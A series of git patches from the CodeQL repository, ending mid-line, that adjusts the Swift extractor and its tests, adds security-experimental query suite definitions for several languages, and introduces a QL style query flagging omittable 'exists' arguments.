| 1 | | file://:0:0:0:0 | __ObjC | getModule: | file://:0:0:0:0 | __ObjC | getInterfaceType: | module<__ObjC> | getName: | __ObjC | getNumberOfBaseTypes: | 0 | isBuiltinModule: | no | isSystemModule: | no | getNumberOfImportedModules: | 1 | getNumberOfExportedModules: | 0 | -| file://:0:0:0:0 | default_module_name | getModule: | file://:0:0:0:0 | default_module_name | getInterfaceType: | module | getName: | default_module_name | getNumberOfBaseTypes: | 0 | isBuiltinModule: | no | isSystemModule: | no | getNumberOfImportedModules: | 3 | getNumberOfExportedModules: | 0 | +| file://:0:0:0:0 | default_module_name | getModule: | file://:0:0:0:0 | default_module_name | getInterfaceType: | module | getName: | default_module_name | getNumberOfBaseTypes: | 0 | isBuiltinModule: | no | isSystemModule: | no | getNumberOfImportedModules: | 4 | getNumberOfExportedModules: | 0 | diff --git a/swift/ql/test/extractor-tests/generated/decl/ModuleDecl/ModuleDecl_getImportedModule.expected b/swift/ql/test/extractor-tests/generated/decl/ModuleDecl/ModuleDecl_getImportedModule.expected index aaae8dfa5cc..ca1793b95ef 100644 --- a/swift/ql/test/extractor-tests/generated/decl/ModuleDecl/ModuleDecl_getImportedModule.expected +++ b/swift/ql/test/extractor-tests/generated/decl/ModuleDecl/ModuleDecl_getImportedModule.expected @@ -1,7 +1,9 @@ | file://:0:0:0:0 | Foo | 0 | file://:0:0:0:0 | Swift | | file://:0:0:0:0 | Foo | 1 | file://:0:0:0:0 | _StringProcessing | | file://:0:0:0:0 | Foo | 2 | file://:0:0:0:0 | _Concurrency | +| file://:0:0:0:0 | Foo | 3 | file://:0:0:0:0 | SwiftOnoneSupport | | file://:0:0:0:0 | __ObjC | 0 | file://:0:0:0:0 | Swift | | file://:0:0:0:0 | default_module_name | 0 | file://:0:0:0:0 | Swift | | file://:0:0:0:0 | default_module_name | 1 | file://:0:0:0:0 | _StringProcessing | | file://:0:0:0:0 | default_module_name | 2 | file://:0:0:0:0 | _Concurrency | +| file://:0:0:0:0 | default_module_name | 3 | file://:0:0:0:0 | SwiftOnoneSupport | diff --git a/swift/ql/test/extractor-tests/generated/stmt/PoundAssertStmt/PoundAssertStmt.expected b/swift/ql/test/extractor-tests/generated/stmt/PoundAssertStmt/PoundAssertStmt.expected index f157a17ca2e..d8ba1130d6f 100644 --- a/swift/ql/test/extractor-tests/generated/stmt/PoundAssertStmt/PoundAssertStmt.expected +++ b/swift/ql/test/extractor-tests/generated/stmt/PoundAssertStmt/PoundAssertStmt.expected @@ -1,3 +1,3 @@ | static_assert.swift:2:1:2:15 | #assert ... | getCondition: | static_assert.swift:2:9:2:14 | ... .==(_:_:) ... | getMessage: | | | static_assert.swift:3:1:3:24 | #assert ... | getCondition: | static_assert.swift:3:9:3:14 | ... .!=(_:_:) ... | getMessage: | hello | -| static_failing_assert.swift:3:1:3:24 | #assert ... | getCondition: | static_failing_assert.swift:3:9:3:14 | ... .==(_:_:) ... | getMessage: | oh my | +| static_failing_assert.swift:4:1:4:24 | #assert ... | getCondition: | static_failing_assert.swift:4:9:4:14 | ... .==(_:_:) ... | getMessage: | oh my | diff --git a/swift/ql/test/extractor-tests/generated/stmt/PoundAssertStmt/static_failing_assert.swift b/swift/ql/test/extractor-tests/generated/stmt/PoundAssertStmt/static_failing_assert.swift index bf9bd80f780..2873c0c04b6 100644 --- a/swift/ql/test/extractor-tests/generated/stmt/PoundAssertStmt/static_failing_assert.swift +++ b/swift/ql/test/extractor-tests/generated/stmt/PoundAssertStmt/static_failing_assert.swift @@ -1,3 +1,4 @@ //codeql-extractor-options: -enable-experimental-static-assert +//codeql-extractor-expected-status: 1 #assert(1 == 0, "oh my") From 5fd5ebc26e1d94813d53df483ef311dd68abc3b6 Mon Sep 17 00:00:00 2001 From: turbo Date: Wed, 14 Dec 2022 22:42:56 +0100 Subject: [PATCH 040/381] Create security-experimental suite helper and all language suite implementations --- .../cpp-security-experimental.qls | 5 +++ .../csharp-security-experimental.qls | 4 ++ .../go-security-experimental.qls | 4 ++ .../java-security-experimental.qls | 4 ++ .../security-experimental-selectors.yml | 45 +++++++++++++++++++ .../python-security-experimental.qls | 4 ++ .../ruby-security-experimental.qls | 4 ++ .../swift-security-experimental.qls | 4 ++ 8 files changed, 74 insertions(+) create mode 100644 cpp/ql/src/codeql-suites/cpp-security-experimental.qls create mode 100644 csharp/ql/src/codeql-suites/csharp-security-experimental.qls create mode 100644 go/ql/src/codeql-suites/go-security-experimental.qls create mode 100644 java/ql/src/codeql-suites/java-security-experimental.qls create mode 100644 misc/suite-helpers/security-experimental-selectors.yml create mode 100644 python/ql/src/codeql-suites/python-security-experimental.qls create mode 100644 ruby/ql/src/codeql-suites/ruby-security-experimental.qls create mode 100644 swift/ql/src/codeql-suites/swift-security-experimental.qls diff --git a/cpp/ql/src/codeql-suites/cpp-security-experimental.qls b/cpp/ql/src/codeql-suites/cpp-security-experimental.qls new file mode 100644 index 00000000000..e8781f7cd1f --- /dev/null +++ b/cpp/ql/src/codeql-suites/cpp-security-experimental.qls @@ -0,0 +1,5 @@ +- description: Extended and experimental security queries for C and C++ +- queries: . +- apply: security-experimental-selectors.yml + from: codeql/suite-helpers +- apply: codeql-suites/exclude-slow-queries.yml diff --git a/csharp/ql/src/codeql-suites/csharp-security-experimental.qls b/csharp/ql/src/codeql-suites/csharp-security-experimental.qls new file mode 100644 index 00000000000..b47176b0e87 --- /dev/null +++ b/csharp/ql/src/codeql-suites/csharp-security-experimental.qls @@ -0,0 +1,4 @@ +- description: Extended and experimental security queries for C# +- queries: . +- apply: security-experimental-selectors.yml + from: codeql/suite-helpers \ No newline at end of file diff --git a/go/ql/src/codeql-suites/go-security-experimental.qls b/go/ql/src/codeql-suites/go-security-experimental.qls new file mode 100644 index 00000000000..ad0bee0fbf5 --- /dev/null +++ b/go/ql/src/codeql-suites/go-security-experimental.qls @@ -0,0 +1,4 @@ +- description: Extended and experimental security queries for Go +- queries: . +- apply: security-experimental-selectors.yml + from: codeql/suite-helpers \ No newline at end of file diff --git a/java/ql/src/codeql-suites/java-security-experimental.qls b/java/ql/src/codeql-suites/java-security-experimental.qls new file mode 100644 index 00000000000..cb0b26d6444 --- /dev/null +++ b/java/ql/src/codeql-suites/java-security-experimental.qls @@ -0,0 +1,4 @@ +- description: Extended and experimental security queries for Java and Kotlin +- queries: . +- apply: security-experimental-selectors.yml + from: codeql/suite-helpers \ No newline at end of file diff --git a/misc/suite-helpers/security-experimental-selectors.yml b/misc/suite-helpers/security-experimental-selectors.yml new file mode 100644 index 00000000000..1ea42707b75 --- /dev/null +++ b/misc/suite-helpers/security-experimental-selectors.yml @@ -0,0 +1,45 @@ +- description: Selectors for selecting the security-extended and experimental security queries for a language +- include: + kind: + - problem + - path-problem + precision: + - high + - very-high + tags contain: + - security +- include: + kind: + - problem + - path-problem + precision: + - medium + problem.severity: + - error + - warning + tags contain: + - security +- include: + kind: + - diagnostic +- include: + kind: + - metric + tags contain: + - summary +- exclude: + query path: + - /^experimental\/.*/ +- include: + tags contain all: + - security + - experimental +- exclude: + deprecated: // +- exclude: + query path: + - Metrics/Summaries/FrameworkCoverage.ql + - /Diagnostics/Internal/.*/ +- exclude: + tags contain: + - model-generator diff --git a/python/ql/src/codeql-suites/python-security-experimental.qls b/python/ql/src/codeql-suites/python-security-experimental.qls new file mode 100644 index 00000000000..09004e85f4a --- /dev/null +++ b/python/ql/src/codeql-suites/python-security-experimental.qls @@ -0,0 +1,4 @@ +- description: Extended and experimental security queries for Python +- queries: . +- apply: security-experimental-selectors.yml + from: codeql/suite-helpers \ No newline at end of file diff --git a/ruby/ql/src/codeql-suites/ruby-security-experimental.qls b/ruby/ql/src/codeql-suites/ruby-security-experimental.qls new file mode 100644 index 00000000000..3e3dd73d466 --- /dev/null +++ b/ruby/ql/src/codeql-suites/ruby-security-experimental.qls @@ -0,0 +1,4 @@ +- description: Extended and experimental security queries for Ruby +- queries: . +- apply: security-experimental-selectors.yml + from: codeql/suite-helpers \ No newline at end of file diff --git a/swift/ql/src/codeql-suites/swift-security-experimental.qls b/swift/ql/src/codeql-suites/swift-security-experimental.qls new file mode 100644 index 00000000000..e44478a232d --- /dev/null +++ b/swift/ql/src/codeql-suites/swift-security-experimental.qls @@ -0,0 +1,4 @@ +- description: Extended and experimental security queries for Swift +- queries: . +- apply: security-experimental-selectors.yml + from: codeql/suite-helpers \ No newline at end of file From e42ae09e1cba6bef6aed01355782b277efd39517 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Thu, 15 Dec 2022 09:50:31 +0100 Subject: [PATCH 041/381] Swift: fix interaction between bash wrapper and open redirection on macOS --- swift/extractor/extractor.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/swift/extractor/extractor.sh b/swift/extractor/extractor.sh index 7040a89a45e..6fdfec50b9b 100755 --- a/swift/extractor/extractor.sh +++ b/swift/extractor/extractor.sh @@ -1,7 +1,7 @@ #!/bin/bash if [[ "$(uname)" == Darwin ]]; then - export DYLD_FALLBACK_LIBRARY_PATH=$(dirname "$0") + export DYLD_LIBRARY_PATH=$(dirname "$0") else export LD_LIBRARY_PATH=$(dirname "$0") fi From 3084eda28a67ba744ab32f93a3bdf5f709275e3a Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Thu, 15 Dec 2022 10:33:47 +0100 Subject: [PATCH 042/381] Swift: add swiftmodule hash map testing to `frontend_invocations` --- .../posix-only/frontend-invocations/.gitignore | 2 ++ .../posix-only/frontend-invocations/test.py | 16 ++++++++++++++++ 2 files changed, 18 insertions(+) create mode 100644 swift/integration-tests/posix-only/frontend-invocations/.gitignore diff --git a/swift/integration-tests/posix-only/frontend-invocations/.gitignore b/swift/integration-tests/posix-only/frontend-invocations/.gitignore new file mode 100644 index 00000000000..050e301cf32 --- /dev/null +++ b/swift/integration-tests/posix-only/frontend-invocations/.gitignore @@ -0,0 +1,2 @@ +hashes.expected +hashes.actual diff --git a/swift/integration-tests/posix-only/frontend-invocations/test.py b/swift/integration-tests/posix-only/frontend-invocations/test.py index 4aec427a4b4..5dec3ca53a5 100644 --- a/swift/integration-tests/posix-only/frontend-invocations/test.py +++ b/swift/integration-tests/posix-only/frontend-invocations/test.py @@ -1,5 +1,21 @@ from create_database_utils import * +from subprocess import check_call +from hashlib import sha256 +from pathlib import Path run_codeql_database_create([ './build.sh', ], lang='swift') + +with open('hashes.expected', 'w') as expected: + for f in sorted(Path().glob("*.swiftmodule")): + with open(f, 'rb') as module: + print(f.name, sha256(module.read()).hexdigest(), file=expected) + +with open('hashes.actual', 'w') as actual: + hashes = [(s.resolve().name, s.name) for s in Path("db/working/swift-extraction-artifacts/hashes").iterdir()] + hashes.sort() + for module, hash in hashes: + print(module, hash, file=actual) + +check_call(['diff', '-u', 'hashes.expected', 'hashes.actual']) From 208388e04de660396290205907083e3a4896c94f Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Thu, 15 Dec 2022 12:35:24 +0100 Subject: [PATCH 043/381] Swift: hard code `libc.dylib` path on macOS Also, handle the corner case where loading libc fails. --- swift/extractor/remapping/SwiftFileInterception.cpp | 13 +++++++++++-- 1 file changed, 11 insertions(+), 2 deletions(-) diff --git a/swift/extractor/remapping/SwiftFileInterception.cpp b/swift/extractor/remapping/SwiftFileInterception.cpp index 5743826fb22..ff97f97869c 100644 --- a/swift/extractor/remapping/SwiftFileInterception.cpp +++ b/swift/extractor/remapping/SwiftFileInterception.cpp @@ -12,7 +12,8 @@ #include "swift/extractor/infra/file/FileHash.h" #ifdef __APPLE__ -#define SHARED_LIBC "libc.dylib" +// path is hardcoded as otherwise redirection could break when setting DYLD_FALLBACK_LIBRARY_PATH +#define SHARED_LIBC "/usr/lib/libc.dylib" #define FILE_CREATION_MODE O_CREAT #else #define SHARED_LIBC "libc.so.6" @@ -24,8 +25,16 @@ namespace fs = std::filesystem; namespace { namespace original { +void* openLibC() { + if (auto ret = dlopen(SHARED_LIBC, RTLD_LAZY)) { + return ret; + } + std::cerr << "Unable to dlopen " SHARED_LIBC "!\n"; + std::abort(); +} + void* libc() { - static auto ret = dlopen(SHARED_LIBC, RTLD_LAZY); + static auto ret = openLibC(); return ret; } From 7f505d8715c759b95e7b1776b438a066317b35a1 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Thu, 15 Dec 2022 14:39:43 +0100 Subject: [PATCH 044/381] Swift: do not filter frontend actions --- swift/extractor/main.cpp | 67 ++++++++++++++-------------------------- 1 file changed, 24 insertions(+), 43 deletions(-) diff --git a/swift/extractor/main.cpp b/swift/extractor/main.cpp index 11c07b42edd..54d5194d940 100644 --- a/swift/extractor/main.cpp +++ b/swift/extractor/main.cpp @@ -32,51 +32,32 @@ static void lockOutputSwiftModuleTraps(const codeql::SwiftExtractorConfiguration } static void processFrontendOptions(swift::FrontendOptions& options) { - using Action = swift::FrontendOptions::ActionType; - switch (options.RequestedAction) { - case Action::EmitModuleOnly: - case Action::MergeModules: - case Action::CompileModuleFromInterface: - case Action::EmitObject: { - auto& inOuts = options.InputsAndOutputs; - std::vector inputs; - inOuts.forEachInput([&](const swift::InputFile& input) { - swift::PrimarySpecificPaths psp{}; - if (std::filesystem::path output = input.getPrimarySpecificPaths().OutputFilename; - !output.empty()) { - if (output.extension() == ".swiftmodule") { - psp.OutputFilename = codeql::redirect(output); - } else { - psp.OutputFilename = "/dev/null"; - } - } - if (std::filesystem::path module = - input.getPrimarySpecificPaths().SupplementaryOutputs.ModuleOutputPath; - !module.empty()) { - psp.SupplementaryOutputs.ModuleOutputPath = codeql::redirect(module); - } - auto inputCopy = input; - inputCopy.setPrimarySpecificPaths(std::move(psp)); - inputs.push_back(std::move(inputCopy)); - return false; - }); - inOuts.clearInputs(); - for (const auto& i : inputs) { - inOuts.addInput(i); + auto& inOuts = options.InputsAndOutputs; + std::vector inputs; + inOuts.forEachInput([&](const swift::InputFile& input) { + std::cerr << input.getFileName() << ":\n"; + swift::PrimarySpecificPaths psp{}; + if (std::filesystem::path output = input.getPrimarySpecificPaths().OutputFilename; + !output.empty()) { + if (output.extension() == ".swiftmodule") { + psp.OutputFilename = codeql::redirect(output); + } else { + psp.OutputFilename = "/dev/null"; } - return; } - case Action::PrintVersion: - case Action::DumpAST: - case Action::PrintAST: - case Action::PrintASTDecl: - // these actions are nice to have on the extractor for debugging, so we preserve them. Also, - // version printing is used by CI to match up the correct compiler version - return; - default: - // otherwise, we have nothing to do - std::cerr << "Frontend action requires no action from extractor, exiting\n"; - std::exit(0); + if (std::filesystem::path module = + input.getPrimarySpecificPaths().SupplementaryOutputs.ModuleOutputPath; + !module.empty()) { + psp.SupplementaryOutputs.ModuleOutputPath = codeql::redirect(module); + } + auto inputCopy = input; + inputCopy.setPrimarySpecificPaths(std::move(psp)); + inputs.push_back(std::move(inputCopy)); + return false; + }); + inOuts.clearInputs(); + for (const auto& i : inputs) { + inOuts.addInput(i); } } From 1e5426fca209034d2964335bd05fbd5f018c3aae Mon Sep 17 00:00:00 2001 From: turbo Date: Wed, 14 Dec 2022 22:42:56 +0100 Subject: [PATCH 045/381] Create security-experimental suite helper and all language suite implementations --- .../cpp-security-experimental.qls | 5 +++ .../csharp-security-experimental.qls | 4 ++ .../go-security-experimental.qls | 4 ++ .../java-security-experimental.qls | 4 ++ .../javascript-security-experimental.qls | 4 ++ .../security-experimental-selectors.yml | 45 +++++++++++++++++++ .../python-security-experimental.qls | 4 ++ .../ruby-security-experimental.qls | 4 ++ .../swift-security-experimental.qls | 4 ++ 9 files changed, 78 insertions(+) create mode 100644 cpp/ql/src/codeql-suites/cpp-security-experimental.qls create mode 100644 csharp/ql/src/codeql-suites/csharp-security-experimental.qls create mode 100644 go/ql/src/codeql-suites/go-security-experimental.qls create mode 100644 java/ql/src/codeql-suites/java-security-experimental.qls create mode 100644 javascript/ql/src/codeql-suites/javascript-security-experimental.qls create mode 100644 misc/suite-helpers/security-experimental-selectors.yml create mode 100644 python/ql/src/codeql-suites/python-security-experimental.qls create mode 100644 ruby/ql/src/codeql-suites/ruby-security-experimental.qls create mode 100644 swift/ql/src/codeql-suites/swift-security-experimental.qls diff --git a/cpp/ql/src/codeql-suites/cpp-security-experimental.qls b/cpp/ql/src/codeql-suites/cpp-security-experimental.qls new file mode 100644 index 00000000000..e8781f7cd1f --- /dev/null +++ b/cpp/ql/src/codeql-suites/cpp-security-experimental.qls @@ -0,0 +1,5 @@ +- description: Extended and experimental security queries for C and C++ +- queries: . +- apply: security-experimental-selectors.yml + from: codeql/suite-helpers +- apply: codeql-suites/exclude-slow-queries.yml diff --git a/csharp/ql/src/codeql-suites/csharp-security-experimental.qls b/csharp/ql/src/codeql-suites/csharp-security-experimental.qls new file mode 100644 index 00000000000..b47176b0e87 --- /dev/null +++ b/csharp/ql/src/codeql-suites/csharp-security-experimental.qls @@ -0,0 +1,4 @@ +- description: Extended and experimental security queries for C# +- queries: . +- apply: security-experimental-selectors.yml + from: codeql/suite-helpers \ No newline at end of file diff --git a/go/ql/src/codeql-suites/go-security-experimental.qls b/go/ql/src/codeql-suites/go-security-experimental.qls new file mode 100644 index 00000000000..ad0bee0fbf5 --- /dev/null +++ b/go/ql/src/codeql-suites/go-security-experimental.qls @@ -0,0 +1,4 @@ +- description: Extended and experimental security queries for Go +- queries: . +- apply: security-experimental-selectors.yml + from: codeql/suite-helpers \ No newline at end of file diff --git a/java/ql/src/codeql-suites/java-security-experimental.qls b/java/ql/src/codeql-suites/java-security-experimental.qls new file mode 100644 index 00000000000..cb0b26d6444 --- /dev/null +++ b/java/ql/src/codeql-suites/java-security-experimental.qls @@ -0,0 +1,4 @@ +- description: Extended and experimental security queries for Java and Kotlin +- queries: . +- apply: security-experimental-selectors.yml + from: codeql/suite-helpers \ No newline at end of file diff --git a/javascript/ql/src/codeql-suites/javascript-security-experimental.qls b/javascript/ql/src/codeql-suites/javascript-security-experimental.qls new file mode 100644 index 00000000000..c823aba4b67 --- /dev/null +++ b/javascript/ql/src/codeql-suites/javascript-security-experimental.qls @@ -0,0 +1,4 @@ +- description: Extended and experimental security queries for JavaScript and TypeScript +- queries: . +- apply: security-experimental-selectors.yml + from: codeql/suite-helpers \ No newline at end of file diff --git a/misc/suite-helpers/security-experimental-selectors.yml b/misc/suite-helpers/security-experimental-selectors.yml new file mode 100644 index 00000000000..1ea42707b75 --- /dev/null +++ b/misc/suite-helpers/security-experimental-selectors.yml @@ -0,0 +1,45 @@ +- description: Selectors for selecting the security-extended and experimental security queries for a language +- include: + kind: + - problem + - path-problem + precision: + - high + - very-high + tags contain: + - security +- include: + kind: + - problem + - path-problem + precision: + - medium + problem.severity: + - error + - warning + tags contain: + - security +- include: + kind: + - diagnostic +- include: + kind: + - metric + tags contain: + - summary +- exclude: + query path: + - /^experimental\/.*/ +- include: + tags contain all: + - security + - experimental +- exclude: + deprecated: // +- exclude: + query path: + - Metrics/Summaries/FrameworkCoverage.ql + - /Diagnostics/Internal/.*/ +- exclude: + tags contain: + - model-generator diff --git a/python/ql/src/codeql-suites/python-security-experimental.qls b/python/ql/src/codeql-suites/python-security-experimental.qls new file mode 100644 index 00000000000..09004e85f4a --- /dev/null +++ b/python/ql/src/codeql-suites/python-security-experimental.qls @@ -0,0 +1,4 @@ +- description: Extended and experimental security queries for Python +- queries: . +- apply: security-experimental-selectors.yml + from: codeql/suite-helpers \ No newline at end of file diff --git a/ruby/ql/src/codeql-suites/ruby-security-experimental.qls b/ruby/ql/src/codeql-suites/ruby-security-experimental.qls new file mode 100644 index 00000000000..3e3dd73d466 --- /dev/null +++ b/ruby/ql/src/codeql-suites/ruby-security-experimental.qls @@ -0,0 +1,4 @@ +- description: Extended and experimental security queries for Ruby +- queries: . +- apply: security-experimental-selectors.yml + from: codeql/suite-helpers \ No newline at end of file diff --git a/swift/ql/src/codeql-suites/swift-security-experimental.qls b/swift/ql/src/codeql-suites/swift-security-experimental.qls new file mode 100644 index 00000000000..e44478a232d --- /dev/null +++ b/swift/ql/src/codeql-suites/swift-security-experimental.qls @@ -0,0 +1,4 @@ +- description: Extended and experimental security queries for Swift +- queries: . +- apply: security-experimental-selectors.yml + from: codeql/suite-helpers \ No newline at end of file From d1d4163b795d2b1a19b7c00b542df8c8644e3ecd Mon Sep 17 00:00:00 2001 From: turbo Date: Sun, 18 Dec 2022 15:55:04 +0100 Subject: [PATCH 046/381] Exclude cpp/wrong-use-of-the-umask --- cpp/ql/src/codeql-suites/cpp-security-experimental.qls | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/cpp/ql/src/codeql-suites/cpp-security-experimental.qls b/cpp/ql/src/codeql-suites/cpp-security-experimental.qls index e8781f7cd1f..ec9699b1ad1 100644 --- a/cpp/ql/src/codeql-suites/cpp-security-experimental.qls +++ b/cpp/ql/src/codeql-suites/cpp-security-experimental.qls @@ -3,3 +3,7 @@ - apply: security-experimental-selectors.yml from: codeql/suite-helpers - apply: codeql-suites/exclude-slow-queries.yml +# Excluding problematically slow experimental queries +- exclude: + query path: + - experimental/Security/CWE/CWE-266/IncorrectPrivilegeAssignment.ql \ No newline at end of file From a1161c6efe3ce1d2d5fc9fdb4d0cd0f9c5915bdd Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Tue, 20 Dec 2022 15:23:43 +0100 Subject: [PATCH 047/381] Swift: remove header patch which is not needed any more --- swift/third_party/load.bzl | 4 +--- .../patches/allow_modfying_output.patch | 12 ------------ 2 files changed, 1 insertion(+), 15 deletions(-) delete mode 100644 swift/third_party/swift-llvm-support/patches/allow_modfying_output.patch diff --git a/swift/third_party/load.bzl b/swift/third_party/load.bzl index 2107eaead6b..bf6e4ae600e 100644 --- a/swift/third_party/load.bzl +++ b/swift/third_party/load.bzl @@ -33,9 +33,7 @@ def load_dependencies(repository_name): build_file = _get_build(repository_name, "swift-llvm-support"), sha256 = sha256, patch_args = ["-p1"], - patches = [ - _get_patch(repository_name, "swift-llvm-support", "allow_modfying_output"), - ], + patches = [], ) http_archive( diff --git a/swift/third_party/swift-llvm-support/patches/allow_modfying_output.patch b/swift/third_party/swift-llvm-support/patches/allow_modfying_output.patch deleted file mode 100644 index 9a7e4e0964a..00000000000 --- a/swift/third_party/swift-llvm-support/patches/allow_modfying_output.patch +++ /dev/null @@ -1,12 +0,0 @@ -We want to be able to redirect module output options to an internal artifact storage. ---- a/include/swift/Frontend/FrontendInputsAndOutputs.h 2022-11-30 12:57:18.000000000 +0100 -+++ b/include/swift/Frontend/FrontendInputsAndOutputs.h 2022-12-08 10:30:43.286040435 +0100 -@@ -182,8 +182,6 @@ - llvm::MemoryBuffer *buffer = nullptr); - - // Outputs -- --private: - friend class ArgsToFrontendOptionsConverter; - friend struct InterfaceSubContextDelegateImpl; - void setMainAndSupplementaryOutputs( From 454af0d7217577c8ef0318181193cc0ddc5ccb22 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Tue, 20 Dec 2022 15:34:18 +0100 Subject: [PATCH 048/381] Swift: fix locking of output swiftmodule trap --- swift/extractor/main.cpp | 23 ++++++++++++++--------- 1 file changed, 14 insertions(+), 9 deletions(-) diff --git a/swift/extractor/main.cpp b/swift/extractor/main.cpp index 54d5194d940..5fb3cb3d7a8 100644 --- a/swift/extractor/main.cpp +++ b/swift/extractor/main.cpp @@ -15,18 +15,22 @@ #include "swift/extractor/remapping/SwiftFileInterception.h" #include "swift/extractor/invocation/SwiftDiagnosticsConsumer.h" #include "swift/extractor/trap/TrapDomain.h" +#include "swift/extractor/infra/file/Path.h" #include using namespace std::string_literals; +// must be called before processFrontendOptions modifies output paths static void lockOutputSwiftModuleTraps(const codeql::SwiftExtractorConfiguration& config, - const swift::CompilerInstance& compiler) { - std::filesystem::path output = compiler.getInvocation().getOutputFilename(); - if (output.extension() == ".swiftmodule") { - if (auto target = codeql::createTargetTrapFile(config, output)) { - *target << "// trap file deliberately empty\n" - "// this swiftmodule was created during the build, so its entities must have" - " been extracted directly from source files"; + const swift::FrontendOptions& options) { + for (const auto& input : options.InputsAndOutputs.getAllInputs()) { + if (const auto& module = input.getPrimarySpecificPaths().SupplementaryOutputs.ModuleOutputPath; + !module.empty()) { + if (auto target = codeql::createTargetTrapFile(config, codeql::resolvePath(module))) { + *target << "// trap file deliberately empty\n" + "// this swiftmodule was created during the build, so its entities must have" + " been extracted directly from source files"; + } } } } @@ -71,12 +75,13 @@ class Observer : public swift::FrontendObserver { : config{config}, diagConsumer{diagConsumer} {} void parsedArgs(swift::CompilerInvocation& invocation) override { - processFrontendOptions(invocation.getFrontendOptions()); + auto& options = invocation.getFrontendOptions(); + lockOutputSwiftModuleTraps(config, options); + processFrontendOptions(options); } void configuredCompiler(swift::CompilerInstance& instance) override { instance.addDiagnosticConsumer(&diagConsumer); - lockOutputSwiftModuleTraps(config, instance); } void performedSemanticAnalysis(swift::CompilerInstance& compiler) override { From aa1d49cb958ffa29696dcde869a34d524ae1d80a Mon Sep 17 00:00:00 2001 From: Tony Torralba Date: Wed, 21 Dec 2022 10:49:21 +0100 Subject: [PATCH 049/381] Add OmittableExists QL-for-QL query --- ql/ql/src/queries/style/OmittableExists.ql | 22 +++++++++++++++++++ .../OmittableExists/OmittableExists.expected | 1 + .../OmittableExists/OmittableExists.qlref | 1 + .../queries/style/OmittableExists/Test.qll | 19 ++++++++++++++++ 4 files changed, 43 insertions(+) create mode 100644 ql/ql/src/queries/style/OmittableExists.ql create mode 100644 ql/ql/test/queries/style/OmittableExists/OmittableExists.expected create mode 100644 ql/ql/test/queries/style/OmittableExists/OmittableExists.qlref create mode 100644 ql/ql/test/queries/style/OmittableExists/Test.qll diff --git a/ql/ql/src/queries/style/OmittableExists.ql b/ql/ql/src/queries/style/OmittableExists.ql new file mode 100644 index 00000000000..a8abd457f15 --- /dev/null +++ b/ql/ql/src/queries/style/OmittableExists.ql @@ -0,0 +1,22 @@ +/** + * @name Omittable 'exists' argument + * @description Writing 'exists(x | pred(x))' is bad practice and can be omitted. + * @kind problem + * @problem.severity warning + * @precision high + * @id ql/omittable-exists + * @tags maintainability + */ + +import ql + +from VarDecl existsArgument, VarAccess use +where + existsArgument = any(Exists e).getAnArgument() and + strictcount(existsArgument.getAnAccess()) = 1 and + use = existsArgument.getAnAccess() and + exists(Call c, int argPos | c.getArgument(argPos) = use | + not existsArgument.getType().getASuperType+() = c.getTarget().getParameterType(argPos) + ) +select existsArgument, "This exists argument can be omitted by using a don't-care expression $@.", + use, "in this argument" diff --git a/ql/ql/test/queries/style/OmittableExists/OmittableExists.expected b/ql/ql/test/queries/style/OmittableExists/OmittableExists.expected new file mode 100644 index 00000000000..4989ce68927 --- /dev/null +++ b/ql/ql/test/queries/style/OmittableExists/OmittableExists.expected @@ -0,0 +1 @@ +| Test.qll:10:10:10:14 | i | This exists argument can be omitted by using a don't-care expression $@. | Test.qll:10:29:10:29 | i | in this argument | diff --git a/ql/ql/test/queries/style/OmittableExists/OmittableExists.qlref b/ql/ql/test/queries/style/OmittableExists/OmittableExists.qlref new file mode 100644 index 00000000000..af9ad5ec40b --- /dev/null +++ b/ql/ql/test/queries/style/OmittableExists/OmittableExists.qlref @@ -0,0 +1 @@ +queries/style/OmittableExists.ql \ No newline at end of file diff --git a/ql/ql/test/queries/style/OmittableExists/Test.qll b/ql/ql/test/queries/style/OmittableExists/Test.qll new file mode 100644 index 00000000000..7852d11d7a6 --- /dev/null +++ b/ql/ql/test/queries/style/OmittableExists/Test.qll @@ -0,0 +1,19 @@ +predicate aPredicate(int i) { none() } + +predicate anotherPredicate(int i) { none() } + +class SmallInt extends int { + SmallInt() { this = [0 .. 10] } +} + +predicate test() { + exists(int i | aPredicate(i)) // BAD + or + exists(int i | aPredicate(i) or anotherPredicate(i)) // BAD [NOT DETECTED] + or + exists(int i | aPredicate(i) and i.abs() = 0) // GOOD + or + exists(int i | aPredicate(i) and exists(int i2 | i = i2)) // GOOD + or + exists(SmallInt i | aPredicate(i)) // GOOD +} From 227e099854a66426467b1caba80d2df712010419 Mon Sep 17 00:00:00 2001 From: Tony Torralba Date: Wed, 21 Dec 2022 12:39:25 +0100 Subject: [PATCH 050/381] Apply code review suggestions Co-authored-by: Mathias Vorreiter Pedersen --- ql/ql/src/queries/style/OmittableExists.ql | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/ql/ql/src/queries/style/OmittableExists.ql b/ql/ql/src/queries/style/OmittableExists.ql index a8abd457f15..24f8875a6df 100644 --- a/ql/ql/src/queries/style/OmittableExists.ql +++ b/ql/ql/src/queries/style/OmittableExists.ql @@ -13,8 +13,7 @@ import ql from VarDecl existsArgument, VarAccess use where existsArgument = any(Exists e).getAnArgument() and - strictcount(existsArgument.getAnAccess()) = 1 and - use = existsArgument.getAnAccess() and + use = unique( | | existsArgument.getAnAccess()) and exists(Call c, int argPos | c.getArgument(argPos) = use | not existsArgument.getType().getASuperType+() = c.getTarget().getParameterType(argPos) ) From ac0c42c5c68d18af1f84960d569a082e773cb46b Mon Sep 17 00:00:00 2001 From: Tony Torralba Date: Wed, 21 Dec 2022 14:09:53 +0100 Subject: [PATCH 051/381] Apply suggestions from code review Co-authored-by: Erik Krogh Kristensen --- ql/ql/src/queries/style/OmittableExists.ql | 4 ++-- .../queries/style/OmittableExists/OmittableExists.expected | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/ql/ql/src/queries/style/OmittableExists.ql b/ql/ql/src/queries/style/OmittableExists.ql index 24f8875a6df..8632eb88919 100644 --- a/ql/ql/src/queries/style/OmittableExists.ql +++ b/ql/ql/src/queries/style/OmittableExists.ql @@ -15,7 +15,7 @@ where existsArgument = any(Exists e).getAnArgument() and use = unique( | | existsArgument.getAnAccess()) and exists(Call c, int argPos | c.getArgument(argPos) = 